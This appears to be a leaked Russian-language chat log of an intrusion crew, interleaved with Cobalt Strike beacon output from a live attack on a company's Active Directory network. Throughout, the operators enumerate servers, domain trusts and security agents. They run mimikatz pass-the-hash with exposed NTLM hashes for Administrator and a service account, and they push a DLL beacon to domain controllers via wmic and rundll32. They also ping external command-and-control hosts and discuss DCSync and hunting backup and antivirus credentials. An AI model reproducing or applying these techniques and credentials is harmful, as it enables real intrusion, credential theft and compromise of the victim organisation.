>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23
>servicePrincipalName: HOST/USHDC1-CSPAPP23
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPAPP23.datacenter.local
```

```
CN=USHDC1-COPSCM02,OR=SCCM,OR=Corporate IT,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-COPSCM02
>servicePrincipalName: WSMAN/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-COPSCM02
>servicePrincipalName: TERMSRV/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-COPSCM02
>servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02
>servicePrincipalName: HOST/USHDC1-COPSCM02
>servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: HOST/USHDC1-COPSCM02.datacenter.local
```

```
CN=USHDC1-CSPSPH02,OR=Production,OR=DM360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPSPH02
>servicePrincipalName: WSMAN/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPSPH02
>servicePrincipalName: TERMSRV/USHDC1-CSPSPH02
>servicePrincipalName: TERMSRV/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02
>servicePrincipalName: HOST/USHDC1-CSPSPH02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPSPH02.datacenter.local
``все*кинь полные хостнеймы с группамиMX даускорило бы процесс работывстречаются уже не первый рази ещё, на что указывают:
FPS
MGW
ARP
SCM
SEC
SPH
?```
	USHDC1-360MX2.datacenter.local
	USHDC1-360MX1.datacenter.local
```
Эти в эксчейнж, выходит?тут в сети стоит rapid7
надо ан машинах теханрей поискать доступ в его консольукажи его...как file server``
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 827:32:16
System 4 Services 0 264 K N/A 5:43:18
smss.exe 224 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 340 Services 0 3,964 K NT AUTHORITY\SYSTEM 0:00:25
csrss.exe 396 Console 1 3,472 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 404 Services 0 3,896 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 448 Console 1 5,900 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 492 Services 0 10,908 K NT AUTHORITY\SYSTEM 0:52:07
lsass.exe 500 Services 0 17,576 K NT AUTHORITY\SYSTEM 0:06:28
svchost.exe 560 Services 0 9,644 K NT AUTHORITY\SYSTEM 0:01:19
svchost.exe 592 Services 0 9,244 K NT AUTHORITY\NETWORK SERVICE 0:03:50
LogonUI.exe 688 Console 1 27,424 K NT AUTHORITY\SYSTEM 0:00:00
MsMpEng.exe 700 Services 0 243,516 K NT AUTHORITY\SYSTEM 2:25:24
dwm.exe 712 Console 1 30,044 K Window Manager\DWM-1 0:00:00
svchost.exe 816 Services 0 15,376 K NT AUTHORITY\LOCAL SERVICE 0:08:36
svchost.exe 844 Services 0 15,452 K NT AUTHORITY\SYSTEM 0:00:36
svchost.exe 860 Services 0 86,460 K NT AUTHORITY\SYSTEM 1:19:39
svchost.exe 912 Services 0 12,748 K NT AUTHORITY\LOCAL SERVICE 0:00:25
svchost.exe 992 Services 0 21,736 K NT AUTHORITY\NETWORK SERVICE 0:05:02
svchost.exe 532 Services 0 11,000 K NT AUTHORITY\LOCAL SERVICE 0:00:29
spoolsv.exe 1108 Services 0 13,520 K NT AUTHORITY\SYSTEM 0:00:13
svchost.exe 1148 Services 0 7,856 K NT AUTHORITY\SYSTEM 0:00:05
ir_agent.exe 1172 Services 0 13,176 K NT AUTHORITY\SYSTEM 0:01:04
conhost.exe 1292 Services 0 3,016 K NT AUTHORITY\SYSTEM 0:00:02
snmp.exe 1304 Services 0 6,856 K NT AUTHORITY\SYSTEM 0:03:05
svchost.exe 1336 Services 0 13,584 K NT AUTHORITY\SYSTEM 0:00:59
vmtoolsd.exe 1352 Services 0 13,800 K NT AUTHORITY\SYSTEM 0:09:42
ir_agent.exe 1372 Services 0 63,968 K NT AUTHORITY\SYSTEM 1:09:54
WmiApSrv.exe 1460 Services 0 8,472 K NT AUTHORITY\SYSTEM 0:01:01
wmi_exporter.exe 1484 Services 0 16,032 K NT AUTHORITY\SYSTEM 0:00:32
WmiPrvSE.exe 1624 Services 0 23,088 K NT AUTHORITY\NETWORK SERVICE 1:55:27
WmiPrvSE.exe 1640 Services 0 48,744 K NT AUTHORITY\SYSTEM 0:31:54
svchost.exe 1908 Services 0 8,936 K NT AUTHORITY\NETWORK SERVICE 0:00:31
svchost.exe 2012 Services 0 4,792 K NT AUTHORITY\NETWORK SERVICE 0:00:02
dllhost.exe 2132 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:04
msdtc.exe 2484 Services 0 7,336 K NT AUTHORITY\NETWORK SERVICE 0:00:04
WmiPrvSE.exe 2572 Services 0 29,720 K NT AUTHORITY\SYSTEM 0:19:40
CcmExec.exe 3696 Services 0 113,032 K NT AUTHORITY\SYSTEM 0:11:09
WmiPrvSE.exe 3804 Services 0 13,636 K NT AUTHORITY\SYSTEM 0:00:37
ir_agent.exe 3964 Services 0 92,692 K NT AUTHORITY\SYSTEM 0:40:51
ir_agent.exe 3972 Services 0 63,404 K NT AUTHORITY\SYSTEM 0:25:50
ir_agent.exe 4016 Services 0 47,476 K NT AUTHORITY\SYSTEM 0:06:02
CmRcService.exe 1648 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:14
WmiPrvSE.exe 3320 Services 0 6,708 K NT AUTHORITY\LOCAL SERVICE 0:00:01
WmiPrvSE.exe 3048 Services 0 10,388 K NT AUTHORITY\LOCAL SERVICE 0:02:01
ir_agent.exe 2832 Services 0 55,420 K NT AUTHORITY\SYSTEM 0:06:02
ir_agent.exe 2392 Services 0 51,596 K NT AUTHORITY\SYSTEM 0:26:38
xagt.exe 3944 Services 0 7,272 K NT AUTHORITY\SYSTEM 0:00:02
WmiPrvSE.exe 3280 Services 0 8,820 K NT AUTHORITY\LOCAL SERVICE 0:00:00
WmiPrvSE.exe 3600 Services 0 8,176 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3396 Services 0 12,148 K NT AUTHORITY\SYSTEM 0:00:00
msiexec.exe 2712 Services 0 5,868 K NT AUTHORITY\SYSTEM 0:00:00

``покажи пиды пожалуйстапутано очень...DC - указание на домен контроллер
FS - указание на файловый сервер
360 - указание на эксчендж вообще, точнее на ССО авторизацию через офис360у этой тачкиа у него один интерфейс?у дк же в спн лдапы, да и в оушке должно быть написаноне? )это домен контроллер....``
CN=USHDC1-360FS1,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1
>servicePrincipalName: WSMAN/USHDC1-360FS1.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1
>servicePrincipalName: HOST/USHDC1-360FS1
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1.datacenter.local
>servicePrincipalName: HOST/USHDC1-360FS1.datacenter.local
``нуу наверное...
а как хост назыается и какая у него ОУ / группа?хмв DEV могу внести?``
Name

Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219

Microsoft Visual C++ 2005 Redistributable (x64)

VMware Tools

Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610

Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610

Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660

Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610

Windows Firewall Configuration Provider

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

Microsoft Forefront Endpoint Protection 2010 Server Management

FireEye Endpoint Agent

Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660

Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610

Configuration Manager Client

Microsoft RichCopy 4.0

Microsoft Endpoint Protection Management Components

Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Windows Resource Kit Tools - SubInAcl.exe

Microsoft Silverlight

Microsoft Security Client

Microsoft Policy Platform

WMI Exporter

Rapid7 Insight Agent
``тоже отработало``
shell wmic /node:10.225.10.202 product get name
``итасклисто под токеном выдалопробуй вмиком
может порт закрыт...под токеном ?```
beacon> shell tasklist /s 10.225.10.202 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.202 /v
[+] host called home, sent: 59 bytes
```агав прошлый раз не успел тасклисты запроситьмне тут осталось те что внизу отсорироватьну и "каталог серверов" по назначениюверно[ ](https://mediaeveryone.com/group/saiglobal-com?msg=foqLBWJKz6u69XSe4) 1``
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
``в датацентре сняты:
AdFind
DA
EA
LA
DC
DCSyncтрасты все сняты?теперь ищу креды от АВ и насы, правильно?да)наконец-тоспустя тысячу летвсё я в датацентре))дэлка то на мою кобублять``
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo d8c5e886568 > \\.\pipe\da5531" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : Administrator
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d8c5e886568 > \\.\pipe\da5531
impers. : no
NTLM : c49d5b83342b859132197d0a73592c0e
  | PID 6988
  | TID 4548
  | LSA Process is now R/W
  | LUID 0 ; 1615963531 (000000:6051a58b)
  \_ msv1_0 - data copy @ 0000006D65B9E580 : OK !
  \_ kerberos - data copy @ 0000006D6776F5E8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000006D65B7B1A8 (16) -> null

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[+] host called home, sent: 126 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 3312;
	ReturnValue = 0;
};


beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging stormname.com [104.200.67.11] with 32 bytes of data:
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55

Ping statistics for 104.200.67.11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 51ms, Average = 51ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 4664;
	ReturnValue = 0;
};


beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

File Not Found

``пробую из кобы @user3
тоже не притягивается, хотя кобу пингует:^(чё он всех видит, меня не видит``
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:48:21> shell wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[+] host called home, sent: 125 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 464;
	ReturnValue = 0;
};


[+] host called home, sent: 32 bytes
[+] host called home, sent: 32 bytes
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:49:20> shell type \\10.225.10.201\C$\ProgramData\p.txt
[Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging passloft.com [192.169.7.15] with 32 bytes of data:
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=51ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55

Ping statistics for 192.169.7.15:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 52ms, Average = 51ms

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:49:51> rm \\10.225.10.201\C$\ProgramData\p.txt
[Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
``dalто есть реально не проще просто дать пасс от своей кобы?вы хотите какой то листенер развернуть на ДК saiglobal.com?вот инициатор сейчас объяснитне понял?)а если ДК saiglobal.com будет через себя трафик пропускать?я думаю @user1 не противиз .128 тогда могу с ней работать?а дает нагузку на твой адрест к он не через себя пропускает трафикехнеапри том, что мою кобу он не видитполучится?а если он себе притянет, а потом мне заспавнитс его кобы работать?+коба user1 пингануласьпроверь доступностьвозьми кобу коллегину вот и ответ)``
beacon> shell type \\10.225.10.201\C$\ProgramData\sq.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\sq.txt
[+] host called home, sent: 73 bytes
[+] received output:

Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

```ты же пытаешься их притянуть)пинг оттуда на твою кобу``
beacon> shell ping firedi.com
[*] Tasked beacon to run: ping firedi.com
[+] host called home, sent: 46 bytes
[+] received output:

Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Reply from 23.106.215.146: bytes=32 time=70ms TTL=54
Reply from 23.106.215.146: bytes=32 time=69ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 68ms, Maximum = 70ms, Average = 68ms

``попробуй пинг на свою кобу``
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo a8192f714f5 > \\.\pipe\da0134" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : Administrator
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo a8192f714f5 > \\.\pipe\da0134
impers. : no
NTLM : c49d5b83342b859132197d0a73592c0e
  | PID 6148
  | TID 4308
  | LSA Process is now R/W
  | LUID 0 ; 1594533110 (000000:5f0aa4f6)
  \_ msv1_0 - data copy @ 0000006D664CBE00 : OK !
  \_ kerberos - data copy @ 0000006D665014C8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000006D664D0B18 (16) -> null

beacon> shell dir \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 66 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

07/16/2016 09:23 AM <DIR> Comms
10/06/2020 12:45 AM <DIR> FireEye
10/06/2020 08:24 AM 8,192 ntuser.dat
05/30/2019 02:57 PM <DIR> Package Cache
04/24/2019 03:13 PM <DIR> regid.1991-06.com.microsoft
07/16/2016 09:23 AM <DIR> SoftwareDistribution
02/02/2018 03:38 PM <DIR> USOPrivate
02/02/2018 03:38 PM <DIR> USOShared
03/13/2019 01:10 PM <DIR> VMware
               1 File(s) 8,192 bytes
               8 Dir(s) 61,425,848,320 bytes free

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 123 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5972;
	ReturnValue = 0;
};


beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging google.com [108.177.122.100] with 32 bytes of data:
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106

Ping statistics for 108.177.122.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C is System
 Volume Serial Number is 9AA9-9DAB

 Directory of C:\ProgramData

07/27/2018 07:11 AM <DIR> AppData
10/06/2020 12:20 AM <DIR> FireEye
02/29/2020 03:37 PM <DIR> GetSupportService_N-Central
02/17/2020 02:15 PM <DIR> N-Able Technologies
10/07/2020 04:09 AM 262,144 ntuser.dat
08/23/2020 12:22 AM <DIR> Package Cache
11/21/2014 08:58 PM <DIR> regid.1991-06.com.microsoft
07/27/2018 07:11 AM <DIR> SnowSoftware
05/19/2020 01:19 PM <DIR> SolarWinds MSP
04/25/2020 12:00 AM <DIR> Tenable
07/25/2020 11:30 AM <DIR> VMware
10/07/2020 03:31 PM 139,680 x64.dll
               2 File(s) 401,824 bytes
              10 Dir(s) 24,960,004,096 bytes free

beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 6624;
	ReturnValue = 0;
};


beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \\10.225.10.201\C$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \\10.225.10.201\C$\ProgramData

File Not Found

```
нихуя опятьвторой дк пробуюостальные тоже?ну 1 не притягиваетсяв датацентр мало серверов что ли[ ](https://mediaeveryone.com/group/saiglobal-com?msg=u28Sfxmtj3eQaJTo) я же писалкак разкреды то в синке и взялна датацентре делка не отрабатывалаа стоптам у всех админов пассы сменили?вот дсинк с этого доменакоторыми прошлый раз лезте не подошлиот датацентра кредов нетSaigProd.local [10.195.100.1]ты сюда лезешь?``
datacenter.local [10.225.10.200]
``ты про это?
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
SaigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
``другие сервера тоже закрыты?``
beacon> shell type \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 71 bytes
[+] received output:

Pinging google.com [216.58.196.142] with 32 bytes of data:
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114

Ping statistics for 216.58.196.142:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 2ms, Average = 2ms
```а в файле?```
beacon> shell wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5772;
	ReturnValue = 0;
};


beacon> shell dir \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \\10.195.100.1.C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/07/2020 03:38 PM 472 p.txt
               1 File(s) 472 bytes
               0 Dir(s) 63,656,124,416 bytes free

``ты так и не отпинговал гугл оттуда?а внешку то видит? xDсесии опять нет нихуя``
beacon> pth SaigProd.local\svc.sccmcliinst aa9249f57aba289658fde8afe795fd67
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:svc.sccmcliinst /domain:SaigProd.local /ntlm:aa9249f57aba289658fde8afe795fd67 /run:"%COMSPEC% /c echo bc8a1c163ef > \\.\pipe\ef7d36" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : svc.sccmcliinst
domain : SaigProd.local
program : C:\Windows\system32\cmd.exe /c echo bc8a1c163ef > \\.\pipe\ef7d36
impers. : no
NTLM : aa9249f57aba289658fde8afe795fd67
  | PID 5712
  | TID 4988
  | LSA Process is now R/W
  | LUID 0 ; 1593611577 (000000:5efc9539)
  \_ msv1_0 - data copy @ 0000006D65BDB260 : OK !
  \_ kerberos - data copy @ 0000006D6776C4E8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000006D65B7ABC8 (16) -> null

beacon> ls \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to list files in \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 47 bytes
[*] Listing: \\10.195.100.1\C$\ProgramData\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 08/22/2013 10:48:41 Application Data
          dir 08/22/2013 10:48:41 Desktop
          dir 08/22/2013 10:48:41 Documents
          dir 10/06/2020 00:44:16 FireEye
          dir 07/16/2020 08:54:26 Microsoft
          dir 07/25/2020 03:40:51 Package Cache
          dir 11/14/2013 02:16:11 regid.1991-06.com.microsoft
          dir 08/22/2013 10:48:41 Start Menu
          dir 08/22/2013 10:48:41 Templates
          dir 07/25/2020 03:41:11 VMware
 70kb file 09/19/2020 21:56:17 ntuser.pol

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\Windows
beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
        1 file(s) copied.

beacon> shell dir \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 64 bytes
beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/06/2020 12:44 AM <DIR> FireEye
07/25/2020 03:40 AM <DIR> Package Cache
11/14/2013 03:16 AM <DIR> regid.1991-06.com.microsoft
07/25/2020 03:41 AM <DIR> VMware
10/07/2020 03:31 PM 139,680 x64.dll
               1 File(s) 139,680 bytes
               4 Dir(s) 63,656,927,232 bytes free

[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \\10.195.100.1.C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/07/2020 03:31 PM 139,680 x64.dll
               1 File(s) 139,680 bytes
               0 Dir(s) 63,656,927,232 bytes free

beacon> shell wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5056;
	ReturnValue = 0;
};


beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \\10.195.100.1.C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

File Not Found

